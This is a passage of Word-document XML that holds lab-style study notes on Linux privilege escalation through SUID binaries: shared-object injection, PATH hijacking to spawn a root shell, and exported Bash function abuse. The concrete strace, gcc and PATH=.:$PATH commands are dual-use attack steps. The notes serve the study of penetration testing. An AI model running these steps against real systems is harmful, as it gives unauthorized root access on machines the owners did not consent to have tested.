      <w:r w:rsidRPr="0084205E">
        <w:t>g+s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> \) -exec ls -l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C469F77" w14:textId="6FFBAB86" w:rsidR="00540179" w:rsidRPr="0084205E" w:rsidRDefault="00540179" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">try to find known exploits for each service via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, Exploit-DB, Google, GitHub, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F022CD" w14:textId="484F2B1B" w:rsidR="00540179" w:rsidRPr="0084205E" w:rsidRDefault="00540179" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>download and exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20357A76" w14:textId="1BBA76D5" w:rsidR="00540179" w:rsidRPr="0084205E" w:rsidRDefault="00540179" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SUID/SGID Executables – Shared Object Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78493493" w14:textId="7F6A181A" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="00540179" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” on a SUID file and search output for open/access calls and for “no such file” errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120C5157" w14:textId="16562D34" w:rsidR="00540179" w:rsidRPr="0084205E" w:rsidRDefault="00540179" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-so 2&gt;&amp;1 | grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>iE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>open|access|no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> such file"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310E4DC" w14:textId="3A424F50" w:rsidR="00540179" w:rsidRPr="0084205E" w:rsidRDefault="00540179" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>search for file load attempts</w:t>
      </w:r>
      <w:r w:rsidR="004F683A" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and see what files are shared in users home directory but cannot be found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE9936B" w14:textId="692DC825" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. /home/user/.config/libcalc.so </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C641407" w14:textId="0F6A0DDB" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create config directory for file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A2472C" w14:textId="1D01728C" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /home/user/.config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B942A51" w14:textId="35792ED9" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">compile bash shell code into a shared object at the location the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">  executable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> was looking for it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614DD2EB" w14:textId="32362510" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -shared -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fPIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -o /home/user/.config/libcalc.so /home/user/tools/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>libcalc.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21265BF3" w14:textId="4087BA68" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file again and get shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCFD00B" w14:textId="6238ACAE" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33456F32" w14:textId="4F8C7EA3" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SUID/SGID Executables – Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE31392" w14:textId="33FDBC8A" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>inheriting user’s PATH environment variable and attempting to execute programs without specifying an absolute path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836B986" w14:textId="003BC5DC" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>identify file and run strings on file to look for strings of printable characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10223668" w14:textId="1FD533C1" w:rsidR="004F683A" w:rsidRPr="0084205E" w:rsidRDefault="004F683A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. strings /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512F3B6B" w14:textId="7D0D2EF8" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>service</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCFDCD9" w14:textId="34FF51C1" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">suggests “service” executable is being called to start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, yet full path of exe (/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/service) is not being used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F025D7" w14:textId="0F141E8A" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">compile </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>service.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> code into an exe called “serve” to spawn a bash shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E43B8C" w14:textId="4ADB16A6" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -o service /home/user/tools/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>service.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5200BC7D" w14:textId="01387966" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">prepend current directory to PATH variable and run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-env exe to gain root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E960083" w14:textId="75F02BB0" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PATH=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>.:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PATH /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8F46D" w14:textId="570FCBF3" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SUID/SGID Executables – Abusing Shell Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14101374" w14:textId="32F75025" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>verify path with strings between two files to confirm which uses absolute path and what does not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CA702F" w14:textId="58FD6094" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. strings /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6EFEE9" w14:textId="5EC73562" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57D622" w14:textId="788249BB" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>absolute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCD1712" w14:textId="28815611" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>vs strings /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF8CCA" w14:textId="3953806C" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537281E1" w14:textId="0DAFE0D5" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>in Bash versions &lt;4.2-048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F510034" w14:textId="43D01B30" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>possible to define shell functions with names that resemble file paths and export functions to be used instead of actual executables in path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AFDB8D" w14:textId="74A98473" w:rsidR="0046428B" w:rsidRPr="0084205E" w:rsidRDefault="0046428B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>verify bash version is less than 4.2-048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B2DF5" w14:textId="6456F966" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
